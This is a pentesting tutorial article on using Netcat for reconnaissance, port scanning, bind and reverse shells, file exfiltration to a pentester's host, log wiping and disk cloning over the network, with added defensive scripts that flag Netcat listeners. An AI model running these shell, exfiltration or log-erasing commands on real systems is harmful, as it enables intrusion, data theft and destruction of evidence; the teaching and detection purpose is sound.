I have been asked to write an article for PentestMag and here it is. Enjoy it
Netcat was created by “Hobbit” and its first stable release was in 2007. We all know Netcat’s legendary reputation as the “Swiss army knife” of pentesting, but do we really know everything about it? We have all used Netcat for one thing or another, but the truth is that Netcat can be used for a plethora of things!
If you have done any security certification or simply taken some cyber-security courses, you will have come across the famous phases of “hacking”:
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Covering Tracks
We have all used Netcat in one or more of these phases in many ways. We have even tried to make a chat client and perhaps transferred files over a network; but have we ever used Netcat to its fullest, at every phase of a pentest? Let’s check:
Step 1: Reconnaissance
We can perform banner grabbing to determine the web server type and version, as well as the version of any other service. Sure, we can do this with Telnet, but unlike Telnet, Netcat does not alter the data stream and supports UDP as well as TCP. The command for banner grabbing with Netcat is the following:
nc [IP address] [port number]
A practical example would be:
Please note that this method is very useful because it tells us not only the web application’s server software but also its version, which may let you skip step 2.
You can also try sending a HEAD or OPTIONS request to get response headers that reveal the scripting language the web application is primarily written in (in this case PHP):
If we try the same syntax with a different port number, we will get interesting results if those ports are open:
Step 2: Scanning
To scan specific ports in order to find potentially sensitive information, such as outdated software and/or web application versions on the server, we can use the following command:
nc -vv -n -z -w1 [IP address] [port number range]
In the screenshot we can see a clear example:
This is what every flag does:
-vv: display more verbose output.
-n: run the scan without resolving hostnames.
-z: run the scan without sending any data to the target system.
-w1: wait no more than 1 second for each connection attempt.
IP address: the IP address of the host we want to scan.
Port numbers: a range can be given, and individual ports can also be listed.
With this method, we can simply figure out which ports are open and which are closed by looking at the connection status (open/closed). If you would like more information about a certain port, you can use the banner grabbing technique to find out the version of the service behind it.
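As an added example (not from the article), the same scan run against a host you administer, with its output checked against the list of ports that are supposed to be listening, so an unexpected listener stands out. The host, the approved list and the sample scan output are assumptions; the parser accepts both the netcat-openbsd and the netcat-traditional output formats.

```shell
#!/bin/sh
# Added example, not from the article: compare the article's scan
# (nc -vv -n -z -w1 HOST PORTS) with the ports that are approved to listen.
# HOST, APPROVED and SAMPLE_SCAN are assumptions / constructed data.
HOST=127.0.0.1
APPROVED="22 443"

# Constructed sample of `nc -vv -n -z -w1` output: the first two lines are in
# netcat-openbsd style, the remaining ones in netcat-traditional style.
SAMPLE_SCAN='Connection to 127.0.0.1 22 port [tcp/*] succeeded!
nc: connect to 127.0.0.1 port 23 (tcp) failed: Connection refused
(UNKNOWN) [127.0.0.1] 443 (https) open
(UNKNOWN) [127.0.0.1] 8080 (http-alt) : Connection refused
(UNKNOWN) [127.0.0.1] 1337 (?) open'

# Reads scan output on stdin; prints one open port number per line.
open_ports() {
    while IFS= read -r line; do
        case "$line" in
            "Connection to "*" port "*"succeeded!")
                printf '%s\n' "$line" | awk '{print $4}' ;;
            *" open")
                printf '%s\n' "$line" | awk '{print $3}' ;;
        esac
    done
    return 0
}

# Prints the open ports that are not in $APPROVED; exit status 1 if any.
unexpected_ports() {
    rc=0
    for p in $(open_ports); do
        case " $APPROVED " in
            *" $p "*) ;;
            *) printf '%s\n' "$p"; rc=1 ;;
        esac
    done
    return $rc
}

# "live" runs the real scan (nc reports on stderr, hence 2>&1);
# otherwise the constructed sample is checked.
if [ "${1:-}" = "live" ]; then
    nc -vv -n -z -w1 "$HOST" 1-1024 2>&1 | unexpected_ports || echo "unexpected listener(s) listed above"
else
    printf '%s\n' "$SAMPLE_SCAN" | unexpected_ports || echo "unexpected listener(s) listed above"
fi
```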
Step 3: Gaining Access
How good is it to have the whole system infrastructure layout, to know they are using an out-of-date version of some software and to know it is vulnerable, if we can’t show the evidence by gaining access to the system? One very common way to gain access to a system with Netcat is to send a crafted file which creates a Netcat listener on a given port on the target, which the attacker then connects to. Note that the target system also has to have Netcat installed, which can be accomplished by:
1) Social Engineering the victim into installing it.
2) By performing phishing.
3) Physical access to the system.
Then, once the listener is up, the attacker can easily connect to the listening port and IP of the target machine and remotely execute code on its behalf. The snippet is as easy as this:
(on the target’s machine)
nc -l -p [listening port] -v -e /bin/bash
(on the attacker’s machine)
nc [Target IP] [listening port]
Besides a bind shell, you can also use Netcat to set up a reverse shell, which is useful when the target sits behind NAT. Instead of the attacker connecting to a port on the target, a reverse shell has the target connect out to the attacker and attach a shell to that connection. Note: to reach a bind shell on a target machine that is behind NAT, port forwarding must be set up for the target’s IP and port.
Step 4: Maintaining Access
Netcat also has great functionality which allows you to create backdoors in order to come back to the system later. We have seen how to create a listener, which gives us a backdoor for remote execution as well as for retrieving files from the target machine; but what about copying files or exfiltrating data?
For this test, we used corporate_secrets.txt as the file we believe the target machine holds. To copy it from the target’s machine to the pentester’s machine, simply do the following:
(on the target’s machine)
cat [file_to_exfiltrate] | nc [IP of Pentester] 1337
(on the pentester’s machine; this listener must be started before the command above)
nc -n -vv -l -p 1337 > [file_to_exfiltrate]
Copying files to the target’s system is also possible:
(on the target’s machine)
nc -lp 1337 > [file]
(on the pentester’s machine)
nc [IP of target] 1337 < [file]
Visual example:
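As an added example, not part of the article, here is the check a defender would run for the listeners described in steps 3 and 4: it scans `ps` output for netcat processes that listen and/or hand the connection to a program. The binary names, flags and the sample process lines are assumptions.

```shell
#!/bin/sh
# Added example, not from the article: flag netcat processes that look like
# the bind shell (nc -l ... -e /bin/bash) or the file-transfer listeners shown
# above, from the output of `ps -eo pid,user,args`. Binary names, flags and
# the sample lines are assumptions; tune them to the netcat build in use.

# Constructed sample of `ps -eo pid,user,args` output.
SAMPLE_PS='  101 root     /usr/sbin/sshd -D
  202 alice    nc -l -p 4444 -v -e /bin/bash
  303 bob      nc -lvp 8080
  404 bob      nc example.org 80
  505 root     ncat -l 9001 --sh-exec /bin/sh
  606 carol    /bin/bash -c "nc -lp 1337 -e /bin/sh"'

# Reads ps lines on stdin; prints "<pid> <reason>" for each netcat process
# that listens (-l) and/or hands the connection to a program (-e, -c, --exec).
flag_nc_listeners() {
    while IFS= read -r line; do
        # Keep only lines that run a netcat variant (nc, ncat, netcat).
        case "$line" in
            *netcat*|*ncat\ *|*\ nc\ *|*/nc\ *|*\"nc\ *) ;;
            *) continue ;;
        esac
        pid=$(printf '%s\n' "$line" | awk '{print $1}')
        reason=""
        case "$line" in
            *\ -e\ *|*\ -c\ *|*--sh-exec*|*--exec*) reason="shell-exec" ;;
        esac
        case "$line" in
            *\ -l*) reason="${reason:+$reason,}listener" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s %s\n' "$pid" "$reason"
        fi
    done
    return 0
}

# Stand-alone run against the constructed sample; on a real host use:
#   ps -eo pid,user,args | flag_nc_listeners
printf '%s\n' "$SAMPLE_PS" | flag_nc_listeners
```

A plain outbound `nc host 80` (the banner-grabbing use from step 1) is deliberately not reported, so the check is about listeners and exec flags, not netcat as such.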
Step 5: Covering Tracks
We know that a hack is not truly successful if we leave tracks all over the place. In this case, we can even delete logs by echoing a blank space into the file, overwriting it with a chunk of data, or copying a fake log file over it on the target system.
echo " " > log.txt
nc [victim IP] [port number] < [fake log file]
Tips and Tricks
Create a simple chat client
In one terminal, type:
nc -vlp 1337
In the other terminal type:
nc [IP of 1st terminal] 1337
Send spoofed HTTP Requests
nc [domain.com] 80
GET / HTTP/1.1
Host: [domain.com]
[Press Enter twice]
Make an instant Web Server with Netcat
while true; do nc -lp 80 -q 1 < test.html; done
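As an added example (not from the article), the same one-file web server, but answering with a real HTTP response (status line, Content-Type, Content-Length) instead of the raw file, so browsers and curl handle it cleanly. It assumes a netcat that accepts `-l -p` and `-q` like the one-liner above; PORT and FILE are assumptions.

```shell
#!/bin/sh
# Added example, not from the article: serve one static file with netcat,
# wrapped in a proper HTTP/1.0 response. PORT and FILE are assumptions.
PORT=8080
FILE=test.html

# Writes a complete HTTP/1.0 response for file $1 to stdout.
# Returns 1 (and writes a 404 response) when the file does not exist.
http_response() {
    f=$1
    if [ ! -f "$f" ]; then
        body='<h1>404 Not Found</h1>'
        printf 'HTTP/1.0 404 Not Found\r\nContent-Type: text/html\r\n'
        printf 'Content-Length: %d\r\nConnection: close\r\n\r\n%s' "${#body}" "$body"
        return 1
    fi
    size=$(wc -c < "$f" | tr -d ' ')
    printf 'HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n'
    printf 'Content-Length: %s\r\nConnection: close\r\n\r\n' "$size"
    cat "$f"
}

# One connection per nc invocation, as in the article's loop: nc reads and
# discards the request, sends the response, and -q 1 closes shortly after.
serve() {
    while true; do
        http_response "$FILE" | nc -l -p "$PORT" -q 1
    done
}

# Stand-alone use: ./server.sh serve   (then open http://localhost:8080/)
if [ "${1:-}" = "serve" ]; then
    serve
fi
```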
Cloning Hard Drive Partitions over the network
dd if=/dev/sda | nc [IP address] 1337
Netcat is more than simply a tool. The phases of hacking and penetration testing are simple, and with Netcat they can be made even simpler than they already appear. Netcat has been in the pentesting industry for decades, but this article helps you keep in touch with old and still reliable ways of taking over systems. It is true that with the help of Metasploit and Meterpreter it is also possible to create backdoors and perform more post-exploitation techniques, but that is beyond the scope of this article. Its purpose was to show that Netcat is still great and simple to use in all phases of hacking.